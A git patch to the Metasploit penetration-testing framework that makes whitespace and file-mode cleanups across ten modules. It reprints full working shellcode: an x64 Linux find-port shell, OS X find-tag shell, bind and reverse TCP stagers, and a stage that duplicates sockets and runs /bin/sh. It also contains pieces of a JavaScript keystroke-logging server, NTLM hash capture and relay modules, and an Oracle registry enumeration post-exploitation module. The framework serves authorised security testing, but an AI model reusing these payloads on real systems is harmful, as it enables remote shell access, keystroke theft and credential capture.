From 201518b66f124c99f338f0034af0f5da26372392 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 17 Oct 2012 17:22:26 -0500 Subject: [PATCH] msftidy corrections --- .../capture/http_javascript_keylogger.rb | 4 +- modules/auxiliary/server/capture/http_ntlm.rb | 4 +- modules/auxiliary/server/http_ntlmrelay.rb | 4 +- .../singles/linux/x64/shell_find_port.rb | 80 ++++++------ modules/payloads/singles/osx/x64/say.rb | 6 +- .../singles/osx/x64/shell_find_tag.rb | 70 +++++----- modules/payloads/stagers/osx/x64/bind_tcp.rb | 122 +++++++++--------- .../payloads/stagers/osx/x64/reverse_tcp.rb | 26 ++-- .../payloads/stages/osx/x64/dupandexecve.rb | 10 +- modules/post/windows/gather/enum_db.rb | 6 +- 10 files changed, 166 insertions(+), 166 deletions(-) diff --git a/modules/auxiliary/server/capture/http_javascript_keylogger.rb b/modules/auxiliary/server/capture/http_javascript_keylogger.rb index 9c4aed7cd3..76379b7fb6 100644 --- a/modules/auxiliary/server/capture/http_javascript_keylogger.rb +++ b/modules/auxiliary/server/capture/http_javascript_keylogger.rb @@ -182,8 +182,8 @@ class Metasploit3 < Msf::Auxiliary print_good("[#{cid}] Logging raw keystrokes to: #{@client_cache[cid][:path_raw]}") end - ::File.open( @client_cache[cid][:path_clean], "a") { |fd| fd.puts nice } - ::File.open( @client_cache[cid][:path_raw], "a") { |fd| fd.write(real) } + ::File.open( @client_cache[cid][:path_clean], "ab") { |fd| fd.puts nice } + ::File.open( @client_cache[cid][:path_raw], "ab") { |fd| fd.write(real) } if nice.length > 0 print_good("[#{cid}] Keys: #{nice}") diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb index 5888b37402..37600f2a6f 100644 --- a/modules/auxiliary/server/capture/http_ntlm.rb +++ b/modules/auxiliary/server/capture/http_ntlm.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary def on_request_uri(cli, request) print_status("Request '#{request.uri}'...") - + case request.method when 'OPTIONS' process_options(cli, request) @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary end exploit() end - + def process_options(cli, request) print_status("OPTIONS #{request.uri}") headers = { diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index 8845535fe0..a23072a310 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Auxiliary # Handles the initial requests waiting for the browser to try NTLM auth def on_request_uri(cli, request) - + case request.method when 'OPTIONS' process_options(cli, request) @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary parse_args() exploit() end - + def process_options(cli, request) print_status("OPTIONS #{request.uri}") headers = { diff --git a/modules/payloads/singles/linux/x64/shell_find_port.rb b/modules/payloads/singles/linux/x64/shell_find_port.rb index 5b574a07d7..513c4751f1 100644 --- a/modules/payloads/singles/linux/x64/shell_find_port.rb +++ b/modules/payloads/singles/linux/x64/shell_find_port.rb @@ -38,50 +38,50 @@ module Metasploit3 'CPORT' => [ 32, 'n' ], }, - 'Assembly' => < %Q| + xor rdi,rdi + xor rbx,rbx + mov bl,0x14 + sub rsp,rbx + lea rdx,[rsp] + lea rsi,[rsp+4] + find_port: + push 0x34 ; getpeername + pop rax + syscall + inc rdi + cmp word [rsi+2],0x4142 + jne find_port + dec rdi + push 2 + pop rsi + dup2: + push 0x21 ; dup2 + pop rax + syscall + dec rsi + jns dup2 + mov rbx,rsi + mov ebx, 0x68732f41 + mov eax,0x6e69622f + shr rbx,8 + shl rbx,32 + or rax,rbx + push rax + mov rdi,rsp + xor rsi,rsi + mov rdx,rsi + push 0x3b ; execve + pop rax + syscall + | } )) end - def size - return 91 - end + def size + return 91 + end end diff --git a/modules/payloads/singles/osx/x64/say.rb b/modules/payloads/singles/osx/x64/say.rb index 71473b145c..8c33032fee 100644 --- a/modules/payloads/singles/osx/x64/say.rb +++ b/modules/payloads/singles/osx/x64/say.rb @@ -38,10 +38,10 @@ module Metasploit3 payload = "\x48\x31\xC0" + # xor rax,rax "\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b - call + - "/usr/bin/say\x00" + + call + + "/usr/bin/say\x00" + say + - "\x48\x8B\x3C\x24" + # mov rdi,[rsp] + "\x48\x8B\x3C\x24" + # mov rdi,[rsp] "\x4C\x8D\x57\x0D" + # lea r10,[rdi+0xd] "\x48\x31\xD2" + # xor rdx,rdx "\x52" + # push rdx diff --git a/modules/payloads/singles/osx/x64/shell_find_tag.rb b/modules/payloads/singles/osx/x64/shell_find_tag.rb index 885789552b..9a6d5a9871 100644 --- a/modules/payloads/singles/osx/x64/shell_find_tag.rb +++ b/modules/payloads/singles/osx/x64/shell_find_tag.rb @@ -44,41 +44,41 @@ module Metasploit3 cmd = (datastore['CMD'] || '') << "\x00" call = "\xe8" + [cmd.length].pack('V') - payload = - "\x48\x31\xFF" + # xor rdi,rdi - "\x57" + # push rdi - "\x48\x89\xE6" + # mov rsi,rsp - "\x6A\x04" + # push byte +0x4 - "\x5A" + # pop rdx - "\x48\x8D\x4A\xFE" + # lea rcx,[rdx-0x2] - "\x4D\x31\xC0" + # xor r8,r8 - "\x4D\x31\xC9" + # xor r9,r9 - "\x48\xFF\xCF" + # dec rdi - "\x48\xFF\xC7" + # inc rdi - "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d - "\x0F\x05" + # loadall286 - "\x81\x3C\x24" + # cmp dword [rsp],0x4e454d4f - datastore['TAG'] + - "\x75\xED" + # jnz 0x17 - "\x48\x31\xC9" + # xor rcx,rcx - "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d - "\x0F\x05" + # loadall286 - "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a - "\x48\x31\xF6" + # xor rsi,rsi - "\x0F\x05" + # loadall286 - "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a - "\x48\xFF\xC6" + # inc rsi - "\x0F\x05" + # loadall286 - "\x48\x31\xC0" + # xor rax,rax - "\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b - call + - cmd + - "\x48\x8B\x3C\x24" + # mov rdi,[rsp] - "\x48\x31\xD2" + # xor rdx,rdx - "\x52" + # push rdx - "\x57" + # push rdi - "\x48\x89\xE6" + # mov rsi,rsp - "\x0F\x05" # loadall286 + payload = + "\x48\x31\xFF" + # xor rdi,rdi + "\x57" + # push rdi + "\x48\x89\xE6" + # mov rsi,rsp + "\x6A\x04" + # push byte +0x4 + "\x5A" + # pop rdx + "\x48\x8D\x4A\xFE" + # lea rcx,[rdx-0x2] + "\x4D\x31\xC0" + # xor r8,r8 + "\x4D\x31\xC9" + # xor r9,r9 + "\x48\xFF\xCF" + # dec rdi + "\x48\xFF\xC7" + # inc rdi + "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d + "\x0F\x05" + # loadall286 + "\x81\x3C\x24" + # cmp dword [rsp],0x4e454d4f + datastore['TAG'] + + "\x75\xED" + # jnz 0x17 + "\x48\x31\xC9" + # xor rcx,rcx + "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d + "\x0F\x05" + # loadall286 + "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a + "\x48\x31\xF6" + # xor rsi,rsi + "\x0F\x05" + # loadall286 + "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a + "\x48\xFF\xC6" + # inc rsi + "\x0F\x05" + # loadall286 + "\x48\x31\xC0" + # xor rax,rax + "\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b + call + + cmd + + "\x48\x8B\x3C\x24" + # mov rdi,[rsp] + "\x48\x31\xD2" + # xor rdx,rdx + "\x52" + # push rdx + "\x57" + # push rdi + "\x48\x89\xE6" + # mov rsi,rsp + "\x0F\x05" # loadall286 end end diff --git a/modules/payloads/stagers/osx/x64/bind_tcp.rb b/modules/payloads/stagers/osx/x64/bind_tcp.rb index 94c8e74529..99174393eb 100644 --- a/modules/payloads/stagers/osx/x64/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x64/bind_tcp.rb @@ -27,67 +27,67 @@ module Metasploit3 { 'Offsets' => { 'LPORT' => [ 31, 'n'] }, 'Payload' => - "\xB8\x61\x00\x00\x02" + # mov eax,0x2000061 - "\x6A\x02" + # push byte +0x2 - "\x5F" + # pop rdi - "\x6A\x01" + # push byte +0x1 - "\x5E" + # pop rsi - "\x48\x31\xD2" + # xor rdx,rdx - "\x0F\x05" + # loadall286 - "\x48\x89\xC7" + # mov rdi,rax - "\xB8\x68\x00\x00\x02" + # mov eax,0x2000068 - "\x48\x31\xF6" + # xor rsi,rsi - "\x56" + # push rsi - "\xBE\x00\x02\x15\xB3" + # mov esi,0xb3150200 - "\x56" + # push rsi - "\x48\x89\xE6" + # mov rsi,rsp - "\x6A\x10" + # push byte +0x10 - "\x5A" + # pop rdx - "\x0F\x05" + # loadall286 - "\xB8\x6A\x00\x00\x02" + # mov eax,0x200006a - "\x48\x31\xF6" + # xor rsi,rsi - "\x48\xFF\xC6" + # inc rsi - "\x49\x89\xFC" + # mov r12,rdi - "\x0F\x05" + # loadall286 - "\xB8\x1E\x00\x00\x02" + # mov eax,0x200001e - "\x4C\x89\xE7" + # mov rdi,r12 - "\x48\x89\xE6" + # mov rsi,rsp - "\x48\x89\xE2" + # mov rdx,rsp - "\x48\x83\xEA\x04" + # sub rdx,byte +0x4 - "\x0F\x05" + # loadall286 - "\x49\x89\xC5" + # mov r13,rax - "\x48\x89\xC7" + # mov rdi,rax - "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d - "\x48\x31\xC9" + # xor rcx,rcx - "\x51" + # push rcx - "\x48\x89\xE6" + # mov rsi,rsp - "\xBA\x04\x00\x00\x00" + # mov edx,0x4 - "\x4D\x31\xC0" + # xor r8,r8 - "\x4D\x31\xD2" + # xor r10,r10 - "\x0F\x05" + # loadall286 - "\x41\x5B" + # pop r11 - "\x4C\x89\xDE" + # mov rsi,r11 - "\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000 - "\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000 - "\xB8\xC5\x00\x00\x02" + # mov eax,0x20000c5 - "\x48\x31\xFF" + # xor rdi,rdi - "\x48\xFF\xCF" + # dec rdi - "\xBA\x07\x00\x00\x00" + # mov edx,0x7 - "\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002 - "\x49\x89\xF8" + # mov r8,rdi - "\x4D\x31\xC9" + # xor r9,r9 - "\x0F\x05" + # loadall286 - "\x48\x89\xC6" + # mov rsi,rax - "\x56" + # push rsi - "\x4C\x89\xEF" + # mov rdi,r13 - "\x48\x31\xC9" + # xor rcx,rcx - "\x4C\x89\xDA" + # mov rdx,r11 - "\x4D\x31\xC0" + # xor r8,r8 - "\x4D\x31\xD2" + # xor r10,r10 - "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d - "\x0F\x05" + # loadall286 - "\x58" + # pop rax - "\xFF\xD0" # call rax + "\xB8\x61\x00\x00\x02" + # mov eax,0x2000061 + "\x6A\x02" + # push byte +0x2 + "\x5F" + # pop rdi + "\x6A\x01" + # push byte +0x1 + "\x5E" + # pop rsi + "\x48\x31\xD2" + # xor rdx,rdx + "\x0F\x05" + # loadall286 + "\x48\x89\xC7" + # mov rdi,rax + "\xB8\x68\x00\x00\x02" + # mov eax,0x2000068 + "\x48\x31\xF6" + # xor rsi,rsi + "\x56" + # push rsi + "\xBE\x00\x02\x15\xB3" + # mov esi,0xb3150200 + "\x56" + # push rsi + "\x48\x89\xE6" + # mov rsi,rsp + "\x6A\x10" + # push byte +0x10 + "\x5A" + # pop rdx + "\x0F\x05" + # loadall286 + "\xB8\x6A\x00\x00\x02" + # mov eax,0x200006a + "\x48\x31\xF6" + # xor rsi,rsi + "\x48\xFF\xC6" + # inc rsi + "\x49\x89\xFC" + # mov r12,rdi + "\x0F\x05" + # loadall286 + "\xB8\x1E\x00\x00\x02" + # mov eax,0x200001e + "\x4C\x89\xE7" + # mov rdi,r12 + "\x48\x89\xE6" + # mov rsi,rsp + "\x48\x89\xE2" + # mov rdx,rsp + "\x48\x83\xEA\x04" + # sub rdx,byte +0x4 + "\x0F\x05" + # loadall286 + "\x49\x89\xC5" + # mov r13,rax + "\x48\x89\xC7" + # mov rdi,rax + "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d + "\x48\x31\xC9" + # xor rcx,rcx + "\x51" + # push rcx + "\x48\x89\xE6" + # mov rsi,rsp + "\xBA\x04\x00\x00\x00" + # mov edx,0x4 + "\x4D\x31\xC0" + # xor r8,r8 + "\x4D\x31\xD2" + # xor r10,r10 + "\x0F\x05" + # loadall286 + "\x41\x5B" + # pop r11 + "\x4C\x89\xDE" + # mov rsi,r11 + "\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000 + "\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000 + "\xB8\xC5\x00\x00\x02" + # mov eax,0x20000c5 + "\x48\x31\xFF" + # xor rdi,rdi + "\x48\xFF\xCF" + # dec rdi + "\xBA\x07\x00\x00\x00" + # mov edx,0x7 + "\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002 + "\x49\x89\xF8" + # mov r8,rdi + "\x4D\x31\xC9" + # xor r9,r9 + "\x0F\x05" + # loadall286 + "\x48\x89\xC6" + # mov rsi,rax + "\x56" + # push rsi + "\x4C\x89\xEF" + # mov rdi,r13 + "\x48\x31\xC9" + # xor rcx,rcx + "\x4C\x89\xDA" + # mov rdx,r11 + "\x4D\x31\xC0" + # xor r8,r8 + "\x4D\x31\xD2" + # xor r10,r10 + "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d + "\x0F\x05" + # loadall286 + "\x58" + # pop rax + "\xFF\xD0" # call rax } )) end diff --git a/modules/payloads/stagers/osx/x64/reverse_tcp.rb b/modules/payloads/stagers/osx/x64/reverse_tcp.rb index 5a78df166d..0370a881ba 100644 --- a/modules/payloads/stagers/osx/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/x64/reverse_tcp.rb @@ -31,19 +31,19 @@ module Metasploit3 'LPORT' => [ 35, 'n'] }, 'Payload' => - "\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" + - "\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" + - "\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" + - "\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" + - "\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" + - "\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" + - "\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" + - "\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" + - "\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" + - "\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" + - "\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" + - "\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" + - "\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0" + "\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" + + "\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" + + "\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" + + "\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" + + "\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" + + "\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" + + "\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" + + "\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" + + "\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" + + "\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" + + "\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" + + "\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" + + "\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0" } )) end diff --git a/modules/payloads/stages/osx/x64/dupandexecve.rb b/modules/payloads/stages/osx/x64/dupandexecve.rb index ddbfba85bf..9896416869 100644 --- a/modules/payloads/stages/osx/x64/dupandexecve.rb +++ b/modules/payloads/stages/osx/x64/dupandexecve.rb @@ -26,11 +26,11 @@ module Metasploit3 'Stage' => { 'Payload' => - "\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"+ - "\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8"+ - "\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69"+ - "\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2"+ - "\x52\x57\x48\x89\xe6\x0f\x05" + "\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"+ + "\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8"+ + "\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69"+ + "\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2"+ + "\x52\x57\x48\x89\xe6\x0f\x05" } )) end diff --git a/modules/post/windows/gather/enum_db.rb b/modules/post/windows/gather/enum_db.rb index 36cf6e2b2f..29e130e40a 100644 --- a/modules/post/windows/gather/enum_db.rb +++ b/modules/post/windows/gather/enum_db.rb @@ -181,18 +181,18 @@ class Metasploit3 < Msf::Post found_key = false basekey_set = ["HKLM\\SOFTWARE\\Oracle\\SYSMAN","HKLM\\SOFTWARE\\ORACLE\\KEY_XE"] basekey_set.each do |basekey| - next if found_key + next if found_key instances = registry_enumkeys(basekey) if instances.nil? or instances.empty? next else found_key = true end - + instances.each do |i| if basekey.include?"KEY_XE" val_ORACLE_SID = registry_getvaldata(basekey,"ORACLE_SID") - val_ORACLE_HOME = registry_getvaldata(basekey,"ORACLE_HOME") + val_ORACLE_HOME = registry_getvaldata(basekey,"ORACLE_HOME") else key = "#{basekey}\\#{i}" val_ORACLE_SID = registry_getvaldata(key,"ORACLE_SID")